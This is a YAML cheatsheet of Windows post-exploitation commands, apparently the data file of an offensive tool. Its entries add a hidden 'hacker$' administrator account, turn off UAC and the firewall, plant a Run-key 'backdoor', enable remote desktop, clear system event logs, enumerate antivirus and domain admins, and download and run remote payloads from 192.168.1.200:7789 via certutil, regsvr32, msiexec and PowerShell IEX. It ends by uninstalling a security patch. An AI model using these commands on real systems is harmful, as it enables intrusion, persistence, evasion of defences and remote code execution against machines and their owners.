cheatsheet:
  -
    cmd: net user hacker$ 123456@cctv /add
    description: add new user
    privilege: administrator

  -
    cmd: net localgroup Administrators hacker$ /add
    description: add user to admin group
    privilege: administrator

  -
    cmd: mshta vbscript:CreateObject(\"Shell.Application\").ShellExecute(\"cmd.exe\",\"/c net user hacker$ 123456@cctv /add\",\"\",\"runas\",1)(window.close)
    description: add new user (need to be turned off UAC!)
    privilege: user

  -
    cmd: whoami /all /fo list
    description: list details of native users
    privilege: user

  -
    cmd: schtasks /query /fo TABLE
    description: query scheduled tasks
    privilege: user

  -
    cmd: schtasks /create /tn restart /ru system /sc ONSTART /tr c:\\windows\\system32\\notepad.exe
    description: create a startup scheduled task
    privilege: administrator

  -
    cmd: schtasks /create /tn daily /tr c:\\windows\\system32\\notepad.exe /sc daily /st 08:00:00 /ed 2023/05/24
    description: create a daily scheduled task
    privilege: user

  -
    cmd: reg query HKLM\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run
    description: query the registry
    privilege: user

  -
    cmd: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ /v EnableLUA /t REG_DWORD /d 0 /f
    description: turn off UAC via the registry
    privilege: administrator

  -
    cmd: reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v backdoor /d \"C:\\puppet.exe\" /f
    description: registry add startup items (HKCU)
    privilege: administrator

  -
    cmd: reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /t REG_DWORD /v portnumber /d 3389 /f
    description: open 3389 remote desktop (step_1:set remote desktop port)
    privilege: administrator

  -
    cmd: wmic RDTOGGLE WHERE ServerName=\"%COMPUTERNAME%\" call SetAllowTSConnections 1 && netstat -an|findstr 3389
    description: open 3389 remote desktop (step_2:wmic opens remote desktop)
    privilege: administrator

  -
    cmd: sc query
    description: enumerate active services and drivers
    privilege: user

  -
    cmd: sc create NewServ binpath=c:\\NewService.exe type=share start=auto
    description: add service
    privilege: administrator

  -
    cmd: netsh firewall show allowedprogram
    description: check the programs allowed by the firewall
    privilege: user

  -
    cmd: netsh advfirewall set allprofiles state off
    description: disable firewall
    privilege: administrator

  -
    cmd: netsh wlan show profiles
    description: displays all wireless network configurations on the local computer
    privilege: user

  -
    cmd: netsh interface ipv4 show config
    description: display local ip address and other network info
    privilege: user

  -
    cmd: netsh interface ipv4 set dnsservers name=\"WLAN 2\" static 10.0.0.1 primary
    description: modify dns config
    privilege: administrator

  -
    cmd: arp -a
    description: display all ARP cache info
    privilege: user

  -
    cmd: route print
    description: display routing table info
    privilege: user

  -
    cmd: wmic process list brief
    description: enumerate summaries of all processes
    privilege: user

  -
    cmd: wmic useraccount list full
    description: list all info of all local users
    privilege: user

  -
    cmd: wmic share list
    description: list all shared resources locally
    privilege: user

  -
    cmd: wmic service get caption,name,startmode,state
    description: list services
    privilege: user

  -
    cmd: wmic product get name
    description: get a list of installed apps
    privilege: user

  -
    cmd: wmic sysdriver get caption,name,pathname,servicetype,state,status /format:list
    description: get driver info
    privilege: user

  -
    cmd: wmic os get /format:list
    description: get operating system details
    privilege: user

  -
    cmd: wmic onboarddevice get description,devicetype,enabled
    description: determine whether the system is a virtual machine through onboard info
    privilege: user

  -
    cmd: wmic /namespace:\\\\root\\securitycenter2 path antivirusproduct get DisplayName,PathToSignedProductExe
    description: Enumerates info about the target anti-virus product
    privilege: user

  -
    cmd: wmic startup get caption,command,location,user
    description: view startup items
    privilege: user

  -
    cmd: wmic nteventlog where filename=\"system\" cleareventlog
    description: clear system log records
    privilege: administrator

  -
    cmd: wmic /node:192.168.123.113 /password:\"123456\" /user:\"administrator\" process call create \"cmd.exe /c shutdown /p\"
    description: execute commands remotely
    privilege: user

  -
    cmd: net view /domain:XXX
    description: view hosts in a domain
    privilege: user

  -
    cmd: setspn -T domains.com -Q */*
    description: view hosts in a domain
    privilege: user

  -
    cmd: net user /domain
    description: view domain users
    privilege: user  

  -
    cmd: net group \"domain admins\" /domain
    description: view domain manager
    privilege: user 

  -
    cmd: net time /domain
    description: locate domain controller
    privilege: user  

  -
    cmd: nltest /domain_trusts
    description: list domain trust relationships
    privilege: user  

  -
    cmd: cmdkey /list
    description: remote connection credentials
    privilege: user  

  -
    cmd: nslookup -type=ns domain.com
    description: find all DNS resolutions
    privilege: user  

  -
    cmd: net use \\\\10.0.0.1\\ipc$ 123456@123cctv /user:administrator
    description: establish an IPC connection
    privilege: user  

  -
    cmd: copy calc.bat \\\\10.0.0.1\\C$
    description: pipe file
    privilege: user  

  -
    cmd: certutil -urlcache -split -f http://192.168.1.200:7789/test.dll
    description: remote download
    privilege: user

  -
    cmd: rundll32 shell32.dll,Control_RunDLL C:\\test.dll
    description: run dll
    privilege: user

  -
    cmd: mshta D:\\test.hta
    description: run hta
    privilege: user

  -
    cmd: rundll32.exe url.dll,OpenURL C:\\test.hta
    description: run hta
    privilege: user

  -
    cmd: regsvr32 /s /n /u /i:http://192.168.1.200:7789/test.sct test.dll
    description: register and call the dll
    privilege: user

  -
    cmd: msiexec /q /i http://192.168.1.200:7789/test.msi
    description: install msi installation package
    privilege: user

  -
    cmd: powershell -windowstyle hidden -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.200:7789/shell.ps1')\";
    description: powerShell load remote script
    privilege: user

  -
    cmd: mshta vbscript:msgbox(\"hello\",36,\"are you ok?\")(window.close)
    description: pop up message box
    privilege: user

  -
    cmd: mshta vbscript:CreateObject(\"sapi.spvoice\").speak(\"Hello!I am Hacker\")(window.close)
    description: voice reading
    privilege: user

  -
    cmd: mshta vbscript:CreateObject(\"Shell.Application\").MinimizeAll()(window.close)
    description: minimize the desktop window
    privilege: user

  -
    cmd: rundll32 user32.dll,LockWorkStation
    description: lock screen
    privilege: user

  -
    cmd: rundll32 powrprof.dll,SetSuspendState
    description: put the computer to sleep
    privilege: user

  -
    cmd: rundll32 url.dll,FileProtocolHandler https://github.com/Ptkatz
    description: open the Web page
    privilege: user

  -
    cmd: wusa /uninstall /kb:4012598 /quiet /norestart
    description: uninstall the KB patch
    privilege: user
